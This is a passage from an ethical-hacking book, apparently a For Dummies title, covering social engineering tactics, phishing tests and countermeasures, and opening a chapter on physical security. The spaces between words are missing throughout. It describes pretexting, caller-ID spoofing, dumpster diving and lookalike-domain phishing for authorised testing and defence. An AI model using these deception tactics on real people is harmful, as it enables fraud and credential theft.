Makesurethepeoplewhowriteyourprivacypolicies(oftennontechnicallawyers)don’tdivulgedetailsaboutyourinformationsecurityinfrastructure.BecarefultoavoidtheexampleofanInternetstart-upbusinessmanwhooncecontactedmeaboutabusinessopportunity.Duringtheconversation,hebraggedabouthiscompany’ssecuritysystemsthatensuredtheprivacyofclientinformation(orsohethought).Iwenttohiswebsitetocheckouthisprivacypolicy.Hehadpostedthebrandandmodeloffirewallhewasusing,alongwithothertechnicalinformationabouthisnetworkandsystemarchitecture.Thistypeofinformationcouldcertainlybeusedagainsthimbythebadguys.Notagoodidea.

http://www.apnic.net/apnic-info/whois_search/

http://whois.arin.net/ui

http://www.lacnic.net/en/

https://apps.db.ripe.net/search/query.html

https://www.nro.net/about-the-nro/list-of-country-codes-and-rirs-ordered-by-country-code

Chapter6

SocialEngineeringInThisChapter

Understandingsocialengineering

Examiningtheramificationsofsocialengineering

Performingsocialengineeringtests

Protectingyourorganizationagainstsocialengineering

Socialengineeringtakesadvantageoftheweakestlinkinanyorganization’sinformationsecuritydefenses:people.Socialengineeringis“peoplehacking”andinvolvesmaliciouslyexploitingthetrustingnatureofhumanbeingstoobtaininformationthatcanbeusedforpersonalgain.

Socialengineeringisoneofthetoughesthackstoperpetratebecauseittakesbravadoandskilltocomeacrossastrustworthytoastranger.It’salsobyfarthetoughestthingtoprotectagainstbecausepeoplewhoaremakingtheirownsecuritydecisionsareinvolved.Inthischapter,Iexploretheconsequencesofsocialengineering,techniquesforyourownethicalhackingefforts,andspecificcountermeasurestodefendagainstsocialengineering.

IntroducingSocialEngineeringInasocialengineeringscenario,thosewithillintentposeassomeoneelsetogaininformationtheylikelycouldn’taccessotherwise.Theythentaketheinformationtheyobtainfromtheirvictimsandwreakhavoconnetworkresources,stealordeletefiles,andevencommitcorporateespionageorsomeotherformoffraudagainsttheorganizationtheyattack.Socialengineeringisdifferentfromphysicalsecurityexploits,suchasshouldersurfinganddumpsterdiving,butthetwotypesofhackingarerelatedandoftenareusedintandem.

Herearesomeexamplesofsocialengineering:

“Supportpersonnel”claimingthattheyneedtoinstallapatchornewversionofsoftwareonauser’scomputer,talktheuserintodownloadingthesoftware,andobtainremotecontrolofthesystem.“Vendors”claimingtoneedtoupdatetheorganization’saccountingpackageorphonesystem,askfortheadministratorpassword,andobtainfullaccess.“Employees”notifyingthesecuritydeskthattheyhavelosttheiraccessbadgetothedatacenter,receiveasetofkeysfromsecurity,andobtainunauthorizedaccesstophysicalandelectronicinformation.Phishinge-mailssentbywhomevertogatheruserIDsandpasswordsofunsuspectingrecipients.Theseattackscanbegenericinnatureormoretargeted—somethingcalledspear-phishingattacks.Thecriminalsthenusethosepasswordstoinstallmalware,gainaccesstothenetwork,captureintellectualproperty,andmore.

Sometimes,socialengineersactasconfidentandknowledgeablemanagersorexecutives.Atothertimestheymightplaytherolesofextremelyuninformedornaïveemployees.Theyalsomightposeasoutsiders,suchasITconsultantsormaintenanceworkers.Socialengineersaregreatatadaptingtotheiraudience.Ittakesaspecialtypeofpersonalitytopullthisoff,oftenresemblingthatofasociopath.

Effectiveinformationsecurity—especiallythesecurityrequiredforfightingsocialengineering—oftenbeginsandendswithyourusers.Otherchaptersinthisbookprovideadviceontechnicalcontrolsthatcanhelpfightsocialengineering,butneverforgetthatbasichumancommunicationsandinteractionhaveaprofoundeffectonthelevelofsecurityinyourorganizationatanygiventime.Thecandy-securityadageis“Hard,crunchyoutside;soft,chewyinside.”Thehard,crunchyoutsideisthelayerofmechanisms—suchasfirewalls,intrusionpreventionsystems,andcontentfiltering—thatorganizationstypicallyrelyontosecuretheirinformation.Thesoft,chewyinsideisthepeopleandtheprocessesinsidetheorganization.Ifthebadguyscangetpastthethickouterlayer,theycancompromisethe(mostly)defenselessinnerlayer.

StartingYourSocialEngineeringTestsIapproachtheethicalhackingmethodologiesinthischapterdifferentlythaninsubsequentchapters.Socialengineeringisanartandascience.Socialengineeringtakesgreatskilltoperformasasecurityprofessionalandishighly-dependentonyourpersonalityandoverallknowledgeoftheorganization.

Ifsocialengineeringisn’tnaturalforyou,considerusingtheinformationinthischapterforeducationalpurposessoyoucanlearntohowtobestdefendagainstit.Don’thesitatetohireathirdpartytoperformthistestingifthatmakesthebestbusinesssensefornow.

Socialengineeringcanharmpeople’sjobsandreputations,andconfidentialinformationcouldbeleaked.Thisisespeciallytruewhenphishingtestsareperformed.Planthingsoutandproceedwithcaution.

Youcanperformsocialengineeringattacksinmillionsofways.Fromwalkingthroughthefrontdoorpurportingtobesomeoneyou’renottolaunchinganall-oute-mailphishingcampaign,theworldisyouroyster.Forthisreason,andbecausetrainingspecificbehaviorsinasinglechapterisnexttoimpossible,Idon’tprovidehow-toinstructionsforcarryingoutsocialengineeringattacks.Instead,Idescribespecificsocialengineeringscenariosthathaveworkedwellformeandothers.Youcantailorthesesametricksandtechniquestoyourspecificsituation.

Anoutsidertotheorganizationmightperformcertainsocialengineeringtechniquessuchasphysicalintrusiontestsbest.Ifyouperformthesetestsagainstyourownorganization,actingasanoutsidermightbedifficultifeveryoneknowsyou.Thisriskofrecognitionmightnotbeaprobleminlargerorganizations,butifyouhaveasmall,close-knitcompany,peoplemightcatchon.

Youcanoutsourcesocialengineeringtestingtoanoutsidefirmorevenhaveatrustedcolleagueperformthetestsforyou.IcoverthetopicofoutsourcingsecurityandethicalhackinginChapter19.

WhyAttackersUseSocialEngineeringPeopleusesocialengineeringtobreakintosystemsandattaininformationbecauseit’softenthesimplestwayforthemtogetwhatthey’relookingfor.They’dmuchratherhavesomeoneopenthedoortotheorganizationthanphysicallybreakinandriskbeingcaught.Securitytechnologiessuchasfirewallsandaccesscontrolswon’tstopadeterminedsocialengineer.

Manysocialengineersperformtheirattacksslowlytoavoidsuspicion.Socialengineersgatherbitsofinformationovertimeandusetheinformationtocreateabroaderpictureoftheorganizationthey’retryingtomanipulate.Thereinliesoneoftheirgreatestassets:time.They’vegotnothingbuttimeandwilltaketheproperamountnecessarytoensuretheirattacksaresuccessfulAlternatively,somesocialengineeringattackscanbeperformedwithaquickphonecallore-mail.Themethodsuseddependontheattacker’sstyleandabilities.Eitherway,you’reatadisadvantage.

Socialengineersknowthatmanyorganizationsdon’thaveformaldataclassificationprograms,accesscontrolsystems,incidentresponseplans,orsecurityawarenessprograms,andtheytakeadvantageoftheseweaknesses.

Socialengineersoftenknowalittleaboutalotofthings—bothinsideandoutsidetheirtargetorganizations—becausethisknowledgehelpsthemintheirefforts.ThankstosocialmediasuchasLinkedIn,Facebook,andotheronlineresourcesIdiscussininChapter5,everytidbitofinformationtheyneedisoftenattheirdisposal.Themoreinformationsocialengineersgainaboutorganizations,theeasieritisforthemtoposeasemployeesorothertrustedinsiders.Socialengineers’knowledgeanddeterminationgivethemtheupperhandovermanagementandtheiremployeeswhodon’trecognizethevalueoftheinformationthatsocialengineersseek.

UnderstandingtheImplicationsManyorganizationshaveenemieswhowanttocausetroublethroughsocialengineering.Thesepeoplemightbecurrentorformeremployeesseekingrevenge,competitorswantingalegup,orhackerstryingtoprovetheirworth.

Regardlessofwhocausesthetrouble,everyorganizationisatrisk—especiallygiventhesprawlingInternetpresenceoftheaveragecompany.Largercompaniesspreadacrossseverallocationsareoftenmorevulnerablegiventheircomplexity,butsmallercompaniescanalsobeattacked.Everyone,fromreceptioniststosecurityguardstoexecutivestoITpersonnel,isapotentialvictimofsocialengineering.Helpdeskandcallcenteremployeesareespeciallyvulnerablebecausetheyaretrainedtobehelpfulandforthcomingwithinformation.

Socialengineeringhasseriousconsequences.Becausetheobjectiveofsocialengineeringistocoercesomeoneforinformationtoleadtoill-gottengains,anythingispossible.Effectivesocialengineerscanobtainthefollowinginformation:

UserpasswordsSecuritybadgesorkeystothebuildingandeventothecomputerroomIntellectualpropertysuchasdesignspecifications,sourcecode,orotherresearchanddevelopmentdocumentationConfidentialfinancialreportsPrivateandconfidentialemployeeinformationPersonally-identifiableinformation(PII)suchashealthrecordsandcardholderinformationCustomerlistsandsalesprospects

Ifanyoftheprecedinginformationisleaked,financiallosses,loweredemployeemorale,decreasedcustomerloyalty,andevenlegalandregulatorycomplianceissuescouldresult.Thepossibilitiesareendless.

Socialengineeringattacksaredifficulttoprotectagainstforvariousreasons.Foronething,theyaren’twelldocumented.Foranother,socialengineersarelimitedonlybytheirimaginations.Also,becausesomanypossiblemethodsexist,recoveryandprotectionaredifficultaftertheattack.Furthermore,thehard,crunchyoutsideoffirewallsandintrusionpreventionsystemsoftencreatesafalsesenseofsecurity,makingtheproblemevenworse.

Withsocialengineering,youneverknowthenextmethodofattack.Thebestthingsyoucandoaretoremainvigilant,understandthesocialengineer’smotivesandmethodologies,andprotectagainstthemostcommonattacksthroughongoingsecurityawarenessinyourorganization.Idiscusshowyoucandothisintherestofthischapter.

BuildingtrustTrust—sohardtogain,yetsoeasytolose.Trustistheessenceofsocialengineering.Mostpeopletrustothersuntilasituationforcesthemnotto.Peoplewanttohelponeanother,especiallyiftrustcanbebuiltandtherequestforhelpseemsreasonable.Mostpeoplewanttobeteamplayersintheworkplaceanddon’trealizewhatcanhappeniftheydivulgetoomuchinformationtoasourcewhoshouldn’tbetrusted.Thistrustallowssocialengineerstoaccomplishtheirgoals.Ofcourse,buildingdeeptrustoftentakestime.Craftysocialengineerscangainitwithinminutesorhours.Howdotheydoit?

Likability:Whocan’trelatetoaniceperson?Everyonelovescourtesy.Thefriendliersocialengineersare—withoutgoingoverboard—thebettertheirchancesofgettingwhattheywant.Socialengineersoftenbegintobuildarelationshipbyestablishingcommoninterests.Theyoftenusetheinformationtheygainintheresearchphasetodeterminewhatthevictimlikesandtopretendthattheylikethosethings,too.Theycanphonevictimsormeettheminpersonand,basedoninformationthesocialengineershavediscoveredabouttheperson,starttalkingaboutlocalsportsteamsorhowwonderfulitistobesingleagain.Afewlow-keyandwell-articulatedcommentscanbethestartofanicenewrelationship.Believability:Believabilityisbasedinpartontheknowledgesocialengineershaveandhowlikabletheyare.Socialengineersalsouseimpersonation—perhapsbyposingasnewemployeesorfellowemployeesthatthevictimhasn’tmet.Theymayevenposeasvendorswhodobusinesswiththeorganization.Theyoftenmodestlyclaimauthoritytoinfluencepeople.Themostcommonsocialengineeringtrickistodosomethingnicesothatthevictimfeelsobligatedtobeniceinreturnortobeateamplayerfortheorganization.

ExploitingtherelationshipAftersocialengineersobtainthetrustoftheirunsuspectingvictims,theycoaxthevictimsintodivulgingmoreinformationthantheyshould.Whammo—thesocialengineercangoinforthekill.Socialengineersdothisthroughface-to-faceorelectroniccommunicationthatvictimsfeelcomfortablewith,ortheyusetechnologytogetvictimstodivulgeinformation.

DeceitthroughwordsandactionsWilysocialengineerscangetinsideinformationfromtheirvictimsinmanyways.Theyareoftenarticulateandfocusonkeepingtheirconversationsmovingwithoutgivingtheirvictimsmuchtimetothinkaboutwhatthey’resaying.However,ifthey’recarelessoroverlyanxiousduringtheirsocialengineeringattacks,thefollowingtip-offsmightgivethemaway:

Actingoverlyfriendlyoreager

MentioningnamesofprominentpeoplewithintheorganizationBraggingaboutauthoritywithintheorganizationThreateningreprimandsifrequestsaren’thonoredActingnervouswhenquestioned(pursingthelipsandfidgeting—especiallythehandsandfeetbecausecontrollingbodypartsthatarefartherfromthefacerequiresmoreconsciouseffort)OveremphasizingdetailsExperiencingphysiologicalchanges,suchasdilatedpupilsorchangesinvoicepitchAppearingrushedRefusingtogiveinformationVolunteeringinformationandansweringunaskedquestionsKnowinginformationthatanoutsidershouldnothaveUsinginsiderspeechorslangasaknownoutsiderAskingstrangequestionsMisspellingwordsinwrittencommunications

Agoodsocialengineerisn’tobviouswiththeprecedingactions,butthesearesomeofthesignsthatmaliciousbehaviorisintheworks.Ofcourse,ifthepersonisasociopathorpsychopath,yourexperiencemayvary.(PsychologyForDummiesbyAdamCashisagoodresourceforsuchcomplexitiesofthehumanmind.)

Socialengineersoftendoafavorforsomeoneandthenturnaroundandaskthatpersonifheorshewouldmindhelpingthem.Thiscommonsocialengineeringtrickworksprettywell.Socialengineersalsooftenusewhat’scalledreversesocialengineering.Thisiswheretheyofferhelpifaspecificproblemarises;sometimepasses,theproblemoccurs(oftenbytheirdoing),andthentheyhelpfixtheproblem—notunlikepoliticiansinWashington,DC!Theymaycomeacrossasheroes,whichcanfurthertheircause.Socialengineersmightaskanunsuspectingemployeeforafavor.Yes—theyjustoutrightaskforafavor.Manypeoplefallforthistrap.

Impersonatinganemployeeiseasy.Socialengineerscanwearasimilar-lookinguniform,makeafakeIDbadge,orsimplydressliketherealemployees.Peoplethink,“Hey—helooksandactslikeme,sohemustbeoneofus.”Socialengineersalsopretendtobeemployeescallingfromanoutsidephoneline.Thistrickisanespeciallypopularwayofexploitinghelpdeskandcallcenterpersonnel.Socialengineersknowthattheseemployeesfallintoaruteasilybecausetheirtasksarerepetitive,suchassaying,“Hello,canIgetyourcustomernumber,please?”

DeceitthroughtechnologyTechnologycanmakethingseasier—andmorefun—forthesocialengineer.Often,a

maliciousrequestforinformationcomesfromacomputerorotherelectronicentitythatthevictimsthinktheycanidentify.Butspoofingacomputername,ane-mailaddress,afaxnumber,oranetworkaddressiseasy.Fortunately,youcantakeafewcountermeasuresagainstthistypeofattack,asdescribedinthenextsection.

Hackerscandeceivethroughtechnologybysendinge-mailthatasksvictimsforcriticalinformation.Suchane-mailusuallyprovidesalinkthatdirectsvictimstoaprofessional-andlegitimate-lookingwebsitethat“updates”suchaccountinformationasuserIDs,passwords,andSocialSecuritynumbers.Theymightalsodothisonsocialnetworkingsites,suchasFacebookandMyspace.

Manyspamandphishingmessagesalsousethistrick.Mostusersareinundatedwithsomuchspamandotherunwantede-mailthattheyoftenlettheirguarddownandopene-mailsandattachmentstheyshouldn’t.Thesee-mailsusuallylookprofessionalandbelievable.Theyoftendupepeopleintodisclosinginformationtheyshouldnevergiveinexchangeforagift.ThesesocialengineeringtricksalsooccurwhenahackerwhohasalreadybrokenintothenetworksendsmessagesorcreatesfakeInternetpop-upwindows.Thesametrickshaveoccurredthroughinstantmessagingandcellphonemessaging.

Insomewell-publicizedincidents,hackerse-mailedtheirvictimsapatchpurportingtocomefromMicrosoftoranotherwell-knownvendor.Usersthinkitlookslikeaduckanditquackslikeaduck—butit’snottherightduck!Themessageisactuallyfromahackerwantingtheusertoinstallthe“patch,”whichinstallsaTrojan-horsekeyloggerorcreatesabackdoorintocomputersandnetworks.Hackersusethesebackdoorstohackintotheorganization’ssystemsorusethevictims’computers(knownaszombies)aslaunchingpadstoattackanothersystem.Evenvirusesandwormscanusesocialengineering.Forinstance,theLoveBugwormtolduserstheyhadasecretadmirer.Whenthevictimsopenedthee-mail,itwastoolate.Theircomputerswereinfected(andperhapsworse,theydidn’thaveasecretadmirer).

TheNigerian419e-mailfraudschemeattemptstoaccessunsuspectingpeople’sbankaccountsandmoney.Thesesocialengineers—Imeanscamsters—offertotransfermillionsofdollarstothevictimtorepatriateadeceasedclient’sfundstotheUnitedStates.Allthevictimmustprovideispersonalbank-accountinformationandalittlemoneyupfronttocoverthetransferexpenses.Victimsthenhavetheirbankaccountsemptied.Thistraphasbeenaroundforawhile,andit’sashamethatpeoplestillfallforit.

ManycomputerizedsocialengineeringtacticscanbeperformedanonymouslythroughInternetproxyservers,anonymizers,remailers,andbasicSMTPserversthathaveanopenrelay.Whenpeoplefallforrequestsforconfidentialpersonalorcorporateinformation,thesourcesofthesesocialengineeringattacksareoftenimpossibletotrack.

PerformingSocialEngineeringAttacksTheprocessofsocialengineeringisactuallyprettybasic.Generally,socialengineersdiscoverthedetailsonpeople,organizationalprocesses,andinformationsystemstoperformtheirattacks.Withthisinformation,theyknowwhattopursue.Socialengineeringattacksaretypicallycarriedoutinfoursimplesteps:

1. Performresearch.2. Buildtrust.3. Exploitrelationshipsforinformationthroughwords,actions,ortechnology.4. Usetheinformationgatheredformaliciouspurposes.

Thesestepscanincludenumeroussubstepsandtechniques,dependingontheattackbeingperformed.

Beforesocialengineersperformtheirattacks,theyneedagoal.Thisisthefirststepintheseattackers’processesforsocialengineering,andthisgoalismostlikelyalreadyimplantedintheirminds.Whatdotheywanttoaccomplish?Whatarethesocialengineerstryingtohack?Why?Dotheywantintellectualproperty,serverpasswords,orisitaccesstheydesire?Or,dotheysimplywanttoprovethatthecompany’sdefensescanbepenetrated?Inyoureffortsasasecurityprofessionalperformingsocialengineering,determinethisoverallgoalbeforeyoubegin.Otherwise,you’lljustbewanderingaimlesslycreatingunnecessaryheadachesandrisksforyouandothersalongtheway.

SeekinginformationAftersocialengineershaveagoalinmind,theytypicallystarttheattackbygatheringpublicinformationabouttheirvictim(s).Manysocialengineersacquireinformationslowlyovertimesotheydon’traisesuspicion.Obviousinformationgatheringisatip-offwhendefendingagainstsocialengineering.Imentionotherwarningsignstobeawareofthroughouttherestofthischapter.

Regardlessoftheinitialresearchmethod,allacriminalmightneedtopenetrateanorganizationisanemployeelist,afewkeyinternalphonenumbers,thelatestnewsfromasocialmediawebsite,oracompanycalendar.Chapter5coversmoredetailsoninformationgathering,butthefollowingareworthcallingout.

UsingtheInternetToday’sbasicresearchmediumistheInternet.AfewminutessearchingonGoogleorothersearchengines,usingsimplekeywords,suchasthecompanynameorspecificemployees’names,oftenproducesalotofinformation.YoucanfindevenmoreinformationinSECfilingsatwww.sec.govandatsuchsitesaswww.hoovers.comandhttp://finance.yahoo.com.Manyorganizations—especiallytheirmanagement—wouldbedismayedtodiscovertheorganizationalinformationthat’savailableonline!

http://www.sec.gov/

http://www.hoovers.com/

http://finance.yahoo.com/

Giventheplethoraofsuchinformation,it’softenenoughtostartasocialengineeringattack.

Criminalscanpayjustafewdollarsforacomprehensiveonlinebackgroundcheckonindividuals,executivesincluded.Thesesearchesturnuppracticallyallpublic—andsometimesprivate—informationaboutapersoninminutes.

DumpsterdivingDumpsterdivingisalittlemorerisky—andit’scertainlymessy.But,it’sahighlyeffectivemethodofobtaininginformation.Thismethodinvolvesliterallyrummagingthroughtrashcansforinformationaboutacompany.

Dumpsterdivingcanturnupeventhemostconfidentialofinformationbecausesomepeopleassumethattheirinformationissafeafteritgoesintothetrash.Mostpeopledon’tthinkaboutthepotentialvalueofthepapertheythrowaway.AndI’mnotjusttalkingabouttherecyclevalue!Thesedocumentsoftencontainawealthofinformationthatcantipoffthesocialengineerwithinformationneededtopenetratetheorganization.Theastutesocialengineerlooksforthefollowinghard-copydocuments:

InternalphonelistsOrganizationalchartsEmployeehandbooks,whichoftencontainsecuritypoliciesNetworkdiagramsPasswordlistsMeetingnotesSpreadsheetsandreportsCustomerrecordsPrintoutsofe-mailsthatcontainconfidentialinformation

Shreddingdocumentsiseffectiveonlyifthepaperiscross-shreddedintotinypiecesofconfetti.Inexpensiveshreddersthatshreddocumentsonlyinlongstripsarebasicallyworthlessagainstadeterminedsocialengineer.Withalittletimeandtape,asavvyhackercanpieceadocumentbacktogetherifthat’swhathe’sdeterminedtodo.

Hackersoftengatherconfidentialpersonalandbusinessinformationfromothersbylisteninginonconversationsheldinrestaurants,coffeeshops,andairports.Peoplewhospeakloudlywhentalkingontheircellphonesarealsoagreatsourceofsensitiveinformationforsocialengineers.(Poeticjustice,perhaps?)Airplanesareagreatplaceforshouldersurfingandgatheringsensitiveinformation.WhileI’moutandaboutinpublicplacesandonairplanes,Ihearand

seeanamazingamountofprivateinformation.Youcanhardlyavoidit!

ThebadguysalsolookinthetrashforUSBdrives,DVDs,andothermedia.SeeChapter7formoreontrashandotherphysicalsecurityissues,includingcountermeasuresforprotectingagainstdumpsterdivers.

PhonesystemsAttackerscanobtaininformationbyusingthedial-by-namefeaturebuiltintomostvoicemailsystems.Toaccessthisfeature,youusuallyjustpress0or#aftercallingthecompany’smainnumberorafteryouentersomeone’svoicemailbox.Thistrickworksbestafterhourstoensurenooneanswers.

Socialengineerscanfindinterestingbitsofinformation,attimes,suchaswhentheirvictimsareoutoftown,justbylisteningtovoicemailmessages.Theycanevenstudyvictims’voicesbylisteningtotheirvoicemailmessages,podcasts,orwebcastssotheycanlearntoimpersonatethosepeople.

Attackerscanprotecttheiridentitiesiftheycanhidewheretheycallfrom.Herearesomewaystheycanhidetheirlocations:

ResidentialphonessometimescanhidetheirnumbersfromcallerIDbydialing*67beforethephonenumber.

Thisfeatureisn’teffectivewhencallingtoll-freenumbers(800,888,877,866)or911.DisposablecellphonesandVoIPservicesworkquitewell,however.

Businessphonesinanofficeusingaphoneswitcharemoredifficulttospoof.However,alltheattackerusuallyneedsistheuserguideandadministratorpasswordforthephoneswitchsoftware.Inmanyswitches,theattackercanenterthesourcenumber—includingafalsifiednumber,suchasthevictim’shomephonenumber.VoIPServerssuchastheopensourceAsterisk(www.asterisk.org)canbeusedandconfiguredtosendanynumbertheywant.

Phishinge-mailsThelatest,andoftenmostsuccessful,meansforhackingiscarriedoutviae-mailphishingwherecriminalssendingboguse-mailstopotentialvictimsinanattempttogetthemtodivulgesensitiveinformationorclickmaliciouslinksthatleadtomalwareinfections.Phishinghasactuallybeenaroundforyears,butithasrecentlygainedgreatervisibilitygivensomehigh-profileexploitsagainstseeminglyimpenetrablebusinessesandfederalgovernmentagencies.Phishing’seffectivenessisamazing,andtheconsequencesareoftenugly.I’mseeingsuccessrates(orfailurerates,dependingonhowyoulookatit)ashighas60–70percentinmyownphishingtesting.Awell-wordede-mailisallittakestogleanpasswords,accesssensitiveinformation,orinjectmalwareintotargetedcomputers.

http://www.asterisk.org/

Youcanperformyourownphishingexercises.Arudimentary,yethighly-effective,methodistosetupane-mailaccountonyourdomain,orideally,adomainthatlookssimilartoyoursataglance,requestinformationorlinktoawebsitethatcollectsinformation,sende-mailstoemployeesorotherusersyouwanttotest,andseewhattheydo.Dotheyopenthee-mail,clickthelink,divulgeinformation,or—ifyou’relucky—noneoftheabove?It’sreallyassimpleasthat.

Beittoday’srushedworldofbusiness,generalusergullibility,ordownrightignorance,it’samazinghowsusceptibletheaveragepersonistophishinge-mailexploits.Agoodphishinge-mailthathasagreaterchanceofbeingopenedandrespondedtocreatesasenseofurgencyandprovidesinformationthatpresumablyonlyaninsiderwouldknow.Beyondthat,manyphishinge-mailsareeasytospotbecausetheyoften:

HavetypographicalerrorsContaingenericsalutationsande-mailsignaturesAsktheusertodirectlyclickonalinkSolicitsensitiveinformation

Amoreformalmeansforexecutingyourphishingtestsistouseatoolmadespecificallyforthejob.TherearecommercialoptionsavailableontheInternetsuchasLUCY(http://phishing-server.com)aswellasfreebiessuchasSimplePhishingToolkit(https://github.com/sptoolkit/sptoolkit)whichisnolongersupportedbutcanstillbeusedforthistypeoftesting.Withbothoptions,haveaccesstopre-installede-mailtemplates,theabilitytoscrape(copypagesfrom)livewebsitessoyoucancustomizeyourowncampaign,andvariousreportingcapabilitiessoyoucantrackwhiche-mailusersaretakingthebaitandfailingyourtests.

http://phishing-server.com

https://github.com/sptoolkit/sptoolkit

SocialEngineeringCountermeasuresYouhaveonlyafewgoodlinesofdefenseagainstsocialengineering.Socialengineeringwillputyourlayereddefensestothetruetest.Evenwithstrongsecuritycontrols,anaïveoruntrainedusercanletthesocialengineerintothenetwork.Neverunderestimatethepowerofsocialengineers—andthatofyourusersandhelpingthemgettheirway.

PoliciesSpecificpolicieshelpwardoffsocialengineeringinthelongterminthefollowingareas:

Classifyinginformationsothatusersdon’thaveaccesstocertainlevelsofinformationtheydon’tneedSettingupuserIDswhenhiringemployeesorcontractorsEstablishingacceptablecomputerusagethatemployeesagreetoinwritingRemovinguserIDsforemployees,contractors,andconsultantswhonolongerworkfortheorganizationSettingandresettingstrongpassphrasesRespondingquicklytosecurityincidents,suchassuspiciousbehaviorandknownmalwareinfectionsProperlyhandlingproprietaryandconfidentialinformationEscortingguestsaroundyourbuilding(s)

Thesepoliciesmustbeenforceableandenforcedforeveryonewithintheorganization.Keepthemup-to-date,tellyourusersaboutthem,and,mostimportant,testthem.

UserawarenessandtrainingOneofthebestlinesofdefenseagainstsocialengineeringistrainingemployeestoidentifyandrespondtosocialengineeringattacks.Userawarenessbeginswithinitialtrainingforeveryoneandfollowswithsecurityawarenessinitiativestokeepsocialengineeringdefensesfreshineveryone’smind.Aligntrainingandawarenesswithspecificsecuritypolicies—youmayalsowanttohaveadedicatedsecuritytrainingandawarenesspolicy.

Consideroutsourcingsecuritytrainingtoaseasonedsecuritytrainer.Employeesoftentaketrainingmoreseriouslyifitcomesfromanoutsider.Similartohowafamilymemberorspousewillignorewhatyouhavetosaybuttakethesamewordstoheartifsomeoneelsesaysit.Outsourcingsecuritytrainingisworth

theinvestmentforthatreasonalone.

Whileyouapproachongoingusertrainingandawarenessinyourorganization,thefollowingtipscanhelpyoucombatsocialengineeringinthelongterm:

Treatsecurityawarenessandtrainingasabusinessinvestment.Trainusersonanongoingbasistokeepsecurityfreshintheirminds.Includeinformationprivacyandsecuritytasksandresponsibilitiesineveryone’sjobdescriptions.Tailoryourcontenttoyouraudiencewheneverpossible.Createasocialengineeringawarenessprogramforyourbusinessfunctionsanduserroles.Keepyourmessagesasnontechnicalaspossible.Developincentiveprogramsforpreventingandreportingincidents.Leadbyexample.

Sharethefollowingtipswithyouruserstohelppreventsocialengineeringattacks:

Neverdivulgeanyinformationunlessyoucanvalidatethatthepeoplerequestingtheinformationneeditandarewhotheysaytheyare.Ifarequestismadeoverthetelephone,verifythecaller’sidentityandcallback.Neverclickane-maillinkthatsupposedlyloadsapagewithinformationthatneedsupdating.Thisisespeciallytrueforunsolicitede-mailsandcanbeespeciallytrickyonmobiledeviceswhereusersdon’thavethebenefitofseeingwherethelinktakesyouinmanycases.EncourageyouruserstovalidateshortenedURLsfrombit.ly,ow.ly,etc.,ifthey’reunsureabouttheirsafetyorlegitimacy.Variouswebsitessuchaswww.checkshorturl.comandhttp://wheredoesthislinkgo.comofferthisservice.Becarefulwhensharingpersonalinformationonsocialnetworkingsites,suchasFacebookorLinkedIn.Also,beonthelookoutforpeopleclaimingtoknowyouorwantingtobeyourfriend.Theirintentionsmightbemalicious.Escortallguestswithinthebuilding.Neveropene-mailattachmentsorotherfilesfromstrangers.Nevergiveoutpasswordsorothersensitiveinformation.

Afewothergeneralsuggestionscanwardoffsocialengineering:

Neverletastrangerconnecttooneofyournetworkjacksorinternalwirelessnetworks—evenforafewseconds.Someonewithill-intentcanplaceanetworkanalyzer,installmalware,orotherwisesetupabackdoorthatcanberemotely

http://www.checkshorturl.com

http://wheredoesthislinkgo.com

accessedwhentheyleave.Classifyyourinformationassets,bothhardcopyandelectronic.Trainallemployeeshowtohandleeachassettype.Developandenforcecomputermediaanddocumentdestructionpoliciesthathelpensuredataishandledcarefullyandstayswhereitshouldbe.Agoodresourceforinformationondestructionpoliciesiswww.pdaconsulting.com/datadp.htm.Usecross-shreddingpapershredders.Betterstill,hireadocument-shreddingcompanythatspecializesinconfidentialdocumentdestruction.

Thefollowingtechniquescanreinforcethecontentofformaltraining:

Newemployeeorientation,traininglunches,e-mails,andnewslettersSocialengineeringsurvivalbrochurewithtipsandFAQsTrinkets,suchasscreensavers,mousepads,stickynotes,pens,andofficepostersthatbearmessagesthatreinforcesecurityprinciples

TheAppendixlistsmyfavoritesecurityawarenesstrinketsandtoolvendorstoimprovesecurityawarenessandeducationinyourorganization.

http://www.pdaconsulting.com/datadp.htm

Chapter7

PhysicalSecurityInThisChapter

Understandingtheimportanceofphysicalsecurity

Lookingforphysicalsecurityvulnerabilities

Implementingcountermeasuresforphysicalsecurityattacks

Istronglybelievethatinformationsecurityismoredependentonnontechnicalpoliciesandbusinessprocessesthanonthetechnicalhardwareandsoftwaresolutionsthatmanypeopleandvendorsswearby.Physicalsecurity,whichistheprotectionofphysicalproperty,encompassesbothtechnicalandnontechnicalcomponents,bothofwhichmustbeaddressed.

Physicalsecurityisanoften-overlookedbutcriticalaspectofaninformationsecurityprogram.Yourabilitytosecureyourinformationdependsonyourabilitytophysicalsecureyouroffice,building,orcampus.Inthischapter,Icoversomecommonphysicalsecurityweaknessesastheyrelatetocomputersandinformationsecuritythatyoumustseekoutandresolve.Ialsooutlinefreeandlow-costcountermeasuresyoucanimplementtominimizeyourbusiness’sphysicalvulnerabilities.

Idon’trecommendbreakingandentering,whichwouldbenecessarytotestcertainphysicalsecurityvulnerabilitiesfully.Instead,approachthoseareastoseehowfaryoucanget.Takeafreshlook—fromanoutsider’sperspective—atthephysicalvulnerabilitiescoveredinthischapter.Youmightdiscoverholesinyourphysicalsecurityinfrastructurethatyouhadpreviouslyoverlooked.

IdentifyingBasicPhysicalSecurityVulnerabilities

Whateveryourcomputer-andnetwork-securitytechnology,practicallyanyhackispossibleifanattackerisinyourbuildingordatacenter.That’swhylookingforphysicalsecurityvulnerabilitiesandfixingthembeforethey’reexploitedissoimportant.

Insmallcompanies,somephysicalsecurityissuesmightnotbeaproblem.Manyphysicalsecurityvulnerabilitiesdependonsuchfactorsas:

SizeofthebuildingNumberofbuildingsorofficelocationsNumberofemployeesLocationandnumberofbuildingentranceandexitpointsPlacementofserverrooms,wiringclosets,anddatacenters

Literallythousandsofpossiblephysicalsecurityweaknessesexist.Thebadguysarealwaysonthelookoutforthem—soyoushouldlookfortheseissuesfirst.HerearesomeexamplesofphysicalsecurityvulnerabilitiesI’vefoundwhenperformingsecurityassessmentsformyclients:

